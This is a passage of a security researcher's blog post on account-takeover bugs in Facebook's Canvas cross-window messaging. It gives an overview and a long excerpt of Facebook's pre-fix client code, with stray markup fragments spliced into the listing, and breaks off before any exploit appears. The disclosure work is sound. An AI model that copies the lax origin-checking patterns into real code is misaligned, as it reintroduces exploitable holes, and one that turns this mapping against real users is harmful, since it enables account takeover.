<!DOCTYPE html>









<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

    

    

  

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers" />
<meta name="author" content="qw" />
<meta property="og:locale" content="en" />
<meta name="description" content="Summery" />
<meta property="og:description" content="Summery" />
<link rel="canonical" href="http://localhost:4000/posts/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers/" />
<meta property="og:url" content="http://localhost:4000/posts/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers/" />
<meta property="og:site_name" content="Youssef Sammouda" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-09-03T05:22:42+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers" />
<meta name="twitter:site" content="@samm0uda" />
<meta name="twitter:creator" content="@qw" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2021-09-03T05:22:42+02:00","datePublished":"2021-09-03T05:22:42+02:00","description":"Summery","headline":"More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers/"},"url":"http://localhost:4000/posts/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers/"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers | Youssef Sammouda
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Youssef Sammouda">
<meta name="application-name" content="Youssef Sammouda">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  

    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.2.1/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.1/dist/jquery.min.js"></script>

  
    <!--
  Switch the mode between dark and light.
-->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get MODE_ATTR() { return "data-mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }
    static get ID() { return "mode-toggle"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener("change", () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }

          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();

      });

    } /* constructor() */

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode
        || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage({
        direction: ModeToggle.ID,
        message: this.modeStatus
      }, "*");
    }

  } /* ModeToggle */

  const toggle = new ModeToggle();

  function flipMode() {
    if (toggle.hasMode) {
      if (toggle.isSysDarkPrefer) {
        if (toggle.isLightMode) {
          toggle.clearMode();
        } else {
          toggle.setLight();
        }

      } else {
        if (toggle.isDarkMode) {
          toggle.clearMode();
        } else {
          toggle.setDark();
        }
      }

    } else {
      if (toggle.isSysDarkPrefer) {
        toggle.setLight();
      } else {
        toggle.setDark();
      }
    }

    toggle.notify();

  } /* flipMode() */

</script>

  
</head>


  <body data-spy="scroll" data-target="#toc" data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" class="mx-auto">
        
          
          <img src="/assets/img/4Y7B9422-4.jpeg" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title">
      <a href="/">Youssef Sammouda</a>
    </div>
    <div class="site-subtitle font-italic"><div>Welcome to my blog!</div></div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100" style="padding-top: 20px;">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>BLOG ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/videos/" class="nav-link">
        <i class="fa-fw fas fa-video ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>VIDEOS</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    
      <button class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
      <a href="https://www.linkedin.com/in/ysammouda/" aria-label="linkedin"
        
        
          
          target="_blank"
        

        

        rel="noopener">
        <i class="fab fa-linkedin"></i>
      </a>
      

    
      

      
      <a href="https://github.com/samm0uda" aria-label="github"
        
        
          
          target="_blank"
        

        

        rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/samm0uda" aria-label="twitter"
        
        
          
          target="_blank"
        

        

        rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        
        

        

        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    
    

    <!--
  The Top Bar
-->


  <div id="topbar-wrapper">
    <div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4">
      <span id="breadcrumb">
        <span>ysamm.com</span></i>
      </span><!-- endof #breadcrumb -->

      <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

      <div id="topbar-title">
        Post
      </div>

      <i id="search-trigger" class="fas fa-search fa-fw"></i>
      <span id="search-wrapper" class="align-items-center">
        <i class="fas fa-search fa-fw"></i>
        <input class="form-control" id="search-input" type="search"
          aria-label="search" autocomplete="off" placeholder="Search...">
      </span>
      <span id="search-cancel" >Cancel</span>
    </div>

  </div>




    
    <div id="main-wrapper" class="d-flex justify-content-center">
      <div id="main" class="container pl-xl-4 pr-xl-4">
        





<div class="row">

  
  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4">
    <div class="post pl-1 pr-1 pl-md-2 pr-md-2">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->


<!-- images -->





<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  

  
  

  

  
  

  




<!-- Wrap prompt element of blockquote with the <div> tag -->







<!-- return -->

<h1 data-toc-skip>More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers</h1>

<div class="post-meta text-muted">
    <!-- published date -->
    <span>
      Posted
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1630639362"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Sep  3, 2021
</em>

    </span>

    <!-- lastmod date -->
    

  

  <div class="d-flex justify-content-between">
    <!-- author(s) -->
    <span>
      

      By

      <em>
      
        
          <a href=""></a>
          
        
      
      </em>
    </span>

    <div>
      <!-- page views -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="2116 words">
  <em>11 min</em> read</span>

    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><strong>Summery</strong></p>

<p>Facebook allowed online games owners to host their games/applications in apps.facebook.com for many years now. The idea and technology behind it was that the game ( Flash or HTML5 based) would be hosted in the owner website and later the website page hosting it should be shown to the Facebook user in apps.facebook.com inside a controlled iframe. Since the game is not hosted in Facebook and for best user experience like keeping score and profile data, Facebook had to establish a communication channel with the game owner to verify the identity of the Facebook user for example. This was ensured by using cross windows communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, i’ll be discussing multiple vulnerabilities i found in this implementation.</p>

<p><strong>Vulnerabilities potential</strong></p>

<p>These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible of verifying what’s coming through this channel. The bugs explained below (and others) allowed me to takeover any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high since these were present for years and billions of user and their information could have been compromised easily since this was served from inside Facebook. Facebook confirmed they didn’t see any indicators of previous abuse or exploitation of these bugs.</p>

<p><strong>For Researchers</strong></p>

<p>Before explaining the actual bugs below, i tried to show the way i decomposed the code and a simplified path to track the flow of the message data and how its components will be used. I probably didn’t left much to dig but i hope the information shared could help you in your research. If you are only interested in the bugs themselves then jump to each bug section part.</p>

<p><strong>Description</strong></p>

<p>So far we know that the game page being served inside an iframe in apps.facebook.com is communicating with the parent window to ask Facebook to do some actions. Among the requested actions , for example , is to show a dialog to the user that would allow him to confirm the usage of the Facebook application owned by the game developers which would help me to identify you and get some information from an access token that they’ll receive if the user decided to user the application. The script responsible of receiving the cross window messages, interpreting them and understanding the action demanded is below ( only necessary parts are shown and as they were before the bugs were fixed ) :</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
</pre></td><td class="rouge-code"><pre><span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
            <span class="nx">handleMessage</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
                <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">Log</span><span class="dl">"</span><span class="p">).</span><span class="nf">debug</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter at </span><span class="dl">"</span> <span class="o">+</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">name</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="nb">window</span><span class="p">.</span><span class="nx">name</span> <span class="o">!==</span> <span class="dl">""</span> <span class="p">?</span> <span class="nb">window</span><span class="p">.</span><span class="nx">name</span> <span class="p">:</span> <span class="nb">window</span> <span class="o">==</span> <span class="nx">top</span> <span class="p">?</span> <span class="dl">"</span><span class="s2">top</span><span class="dl">"</span> <span class="p">:</span> <span class="dl">"</span><span class="s2">[no name]</span><span class="dl">"</span><span class="p">)</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> handleMessage </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">a</span><span class="p">));</span>
                <span class="k">if </span><span class="p">(</span><span class="k">typeof</span> <span class="nx">a</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">string</span><span class="dl">"</span> <span class="o">&amp;&amp;</span> <span class="sr">/^FB_RPC:/</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">a</span><span class="p">))</span> <span class="p">{</span>
                    <span class="nx">k</span><span class="p">.</span><span class="nf">enqueue</span><span class="p">([</span><span class="nx">a</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">7</span><span class="p">),</span> <span class="p">{</span>
                        <span class="na">origin</span><span class="p">:</span> <span class="nx">b</span><span class="p">,</span>
                        <span class="na">source</span><span class="p">:</span> <span class="nx">e</span> <span class="o">||</span> <span class="nx">i</span><span class="p">[</span><span class="nx">h</span><span class="p">]</span>
                    <span class="p">}]);</span>
           <span class="p">...</span>
            <span class="nx">send</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
                <span class="kd">var</span> <span class="nx">f</span> <span class="o">=</span> <span class="nx">e</span> <span class="k">in</span> <span class="nx">i</span> <span class="p">?</span> <span class="nx">e</span> <span class="p">:</span> <span class="nx">h</span><span class="p">;</span>
                <span class="nx">a</span> <span class="o">=</span> <span class="k">typeof</span> <span class="nx">a</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">string</span><span class="dl">"</span> <span class="p">?</span> <span class="nx">a</span> <span class="p">:</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">QueryString</span><span class="dl">"</span><span class="p">).</span><span class="nf">encode</span><span class="p">(</span><span class="nx">a</span><span class="p">);</span>
                <span class="nx">b</span> <span class="o">=</span> <span class="nx">b</span><span class="p">;</span>
                <span class="k">try</span> <span class="p">{</span>
                    <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">SecurePostMessage</span><span class="dl">"</span><span class="p">).</span><span class="nf">sendMessageToSpecificOrigin</span><span class="p">(</span><span class="nx">b</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span>
                <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
                    <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">Log</span><span class="dl">"</span><span class="p">).</span><span class="nf">error</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter: Proxy for %s not available, page might have been navigated: %s</span><span class="dl">"</span><span class="p">,</span> <span class="nx">f</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">message</span><span class="p">),</span> <span class="k">delete</span> <span class="nx">i</span><span class="p">[</span><span class="nx">f</span><span class="p">]</span>
                <span class="p">}</span>
                <span class="k">return</span> <span class="o">!</span><span class="mi">0</span>
            <span class="p">}</span>
<span class="p">...</span>

    <span class="nb">window</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">message</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if </span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdArbiterSyn</span><span class="p">)</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">SecurePostMessage</span><span class="dl">"</span><span class="p">).</span><span class="nf">sendMessageAllowAnyOrigin_UNSAFE</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">,</span> <span class="p">{</span>
            <span class="na">xdArbiterAck</span><span class="p">:</span> <span class="o">!</span><span class="mi">0</span>
        <span class="p">});</span>
        <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdArbiterRegister</span><span class="p">)</span> <span class="p">{</span>
            <span class="kd">var</span> <span class="nx">b</span> <span class="o">=</span> <span class="nx">l</span><span class="p">.</span><span class="nf">register</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdProxyName</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">origin</span><span class="p">);</span>
            <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">SecurePostMessage</span><span class="dl">"</span><span class="p">).</span><span class="nf">sendMessageAllowAnyOrigin_UNSAFE</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">,</span> <span class="p">{</span>
                <span class="na">xdArbiterRegisterAck</span><span class="p">:</span> <span class="nx">b</span>
            <span class="p">})</span>
        <span class="p">}</span> <span class="k">else</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdArbiterHandleMessage</span> <span class="o">&amp;&amp;</span> <span class="nx">l</span><span class="p">.</span><span class="nf">handleMessage</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">message</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">)</span>
<span class="p">}),</span> <span class="mi">98</span><span class="p">);</span>

<span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">JSONRPC</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
        <span class="nx">c</span><span class="p">.</span><span class="nx">read</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">c</span><span class="p">)</span> <span class="p">{</span>
            <span class="p">...</span>
            <span class="nx">e</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">local</span><span class="p">[</span><span class="nx">a</span><span class="p">.</span><span class="nx">method</span><span class="p">];</span>
            <span class="k">try</span> <span class="p">{</span>
                <span class="nx">e</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nf">apply</span><span class="p">(</span><span class="nx">c</span> <span class="o">||</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">params</span><span class="p">);</span>
                <span class="k">typeof</span> <span class="nx">e</span> <span class="o">!==</span> <span class="dl">"</span><span class="s2">undefined</span><span class="dl">"</span> <span class="o">&amp;&amp;</span> <span class="nf">g</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span>
            <span class="p">...</span>
    <span class="nx">e</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="nx">a</span>
<span class="p">}),</span> <span class="kc">null</span><span class="p">);</span>

<span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformAppController</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
<span class="kd">function</span> <span class="nf">f</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span>
         <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformDialogClient</span><span class="dl">"</span><span class="p">).</span><span class="k">async</span><span class="p">(</span><span class="nx">f</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">d</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="nf">b</span><span class="p">(</span><span class="nx">d</span><span class="p">)</span> <span class="p">});</span>
<span class="p">}...</span>
<span class="nx">t</span><span class="p">.</span><span class="nx">local</span><span class="p">.</span><span class="nx">showDialog</span> <span class="o">=</span> <span class="nx">f</span><span class="p">;</span>

<span class="p">...</span>

<span class="nx">t</span> <span class="o">=</span> <span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">JSONRPC</span><span class="dl">"</span><span class="p">))(</span><span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span>
            <span class="kd">var</span> <span class="nx">d</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">origin</span> <span class="o">||</span> <span class="nx">k</span><span class="p">;</span>
            <span class="nx">b</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">source</span><span class="p">;</span>
            <span class="k">if </span><span class="p">(</span><span class="nx">b</span> <span class="o">==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
                <span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">ge</span><span class="dl">"</span><span class="p">)(</span><span class="nx">j</span><span class="p">);</span>
                <span class="nx">b</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nx">contentWindow</span>
            <span class="p">}</span>
            <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter</span><span class="dl">"</span><span class="p">).</span><span class="nf">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">d</span><span class="p">)</span>
        <span class="p">}</span>
<span class="p">...</span>

<span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;}</span><span class="se">)</span><span class="sr">, null</span><span class="se">)</span><span class="err">;
</span>
<span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformDialogClient</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
<span class="kd">function</span> <span class="nf">async</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
        <span class="kd">var</span> <span class="nx">f</span> <span class="o">=</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">guid</span><span class="dl">"</span><span class="p">)(),</span>
            <span class="nx">g</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">state</span><span class="p">;</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">state</span> <span class="o">=</span> <span class="nx">f</span><span class="p">;</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">redirect_uri</span> <span class="o">=</span> <span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/dialog/return/arbiter</span><span class="dl">"</span><span class="p">).</span><span class="nf">setSubdomain</span><span class="p">(</span><span class="dl">"</span><span class="s2">www</span><span class="dl">"</span><span class="p">).</span><span class="nf">setFragment</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">QueryString</span><span class="dl">"</span><span class="p">).</span><span class="nf">encode</span><span class="p">({</span>
            <span class="na">origin</span><span class="p">:</span> <span class="nx">b</span><span class="p">.</span><span class="nx">redirect_uri</span>
        <span class="p">})).</span><span class="nf">getQualifiedURI</span><span class="p">().</span><span class="nf">toString</span><span class="p">();</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">display</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">;</span>
        <span class="nx">j</span><span class="p">[</span><span class="nx">f</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
            <span class="na">callback</span><span class="p">:</span> <span class="nx">e</span> <span class="o">||</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{},</span>
            <span class="na">state</span><span class="p">:</span> <span class="nx">g</span>
        <span class="p">};</span>
        <span class="nx">e</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="p">;</span>
        <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">AsyncDialog</span><span class="dl">"</span><span class="p">).</span><span class="nf">send</span><span class="p">(</span><span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">AsyncRequest</span><span class="dl">"</span><span class="p">))(</span><span class="k">this</span><span class="p">.</span><span class="nf">getURI</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)).</span><span class="nf">setMethod</span><span class="p">(</span><span class="nx">e</span><span class="p">).</span><span class="nf">setReadOnly</span><span class="p">(</span><span class="o">!</span><span class="mi">0</span><span class="p">).</span><span class="nf">setAbortHandler</span><span class="p">(</span><span class="nf">k</span><span class="p">(</span><span class="nx">f</span><span class="p">)).</span><span class="nf">setErrorHandler</span><span class="p">(</span><span class="nf">l</span><span class="p">(</span><span class="nx">f</span><span class="p">)))</span>
    <span class="p">}</span>
<span class="p">...</span>
<span class="kd">function</span> <span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;getURI</span><span class="se">(</span><span class="sr">a, b</span><span class="se">)</span><span class="sr"> </span><span class="err">{
</span>        <span class="k">if </span><span class="p">(</span><span class="nx">b</span><span class="p">.</span><span class="nx">version</span><span class="p">)</span> <span class="p">{</span>
